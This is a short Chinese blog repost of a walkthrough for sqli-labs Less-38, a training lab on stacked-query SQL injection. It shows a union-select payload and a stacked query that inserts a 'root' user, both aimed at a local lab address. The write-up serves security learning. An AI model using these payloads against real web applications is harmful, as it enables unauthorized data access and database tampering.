我是靠谱客的博主 飞快大树,这篇文章主要介绍【sqli-labs】 less38 GET -Stacked Query Injection -String based (GET型堆叠查询字符型注入)...,现在分享给大家,希望可以做个参考。
这个直接用union select就可以
http://192.168.136.128/sqli-labs-master/Less-38/?id=0' union select 1,2,3%23
看一下源码,发现这关的关键并不在此
mysqli_multi_query()是可以执行多条语句的
来看这个语句
两条select都得到了执行
这个就涉及到了堆叠注入,参考 https://www.cnblogs.com/0nth3way/articles/7128189.html
http://192.168.136.128/sqli-labs-master/Less-38/?id=1';insert into users(id,username,password) values (15,'root','root')%23
insert执行成功
转载于:https://www.cnblogs.com/omnis/p/8384780.html
最后
以上就是飞快大树最近收集整理的关于【sqli-labs】 less38 GET -Stacked Query Injection -String based (GET型堆叠查询字符型注入)...的全部内容,更多相关【sqli-labs】内容请搜索靠谱客的其他文章。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复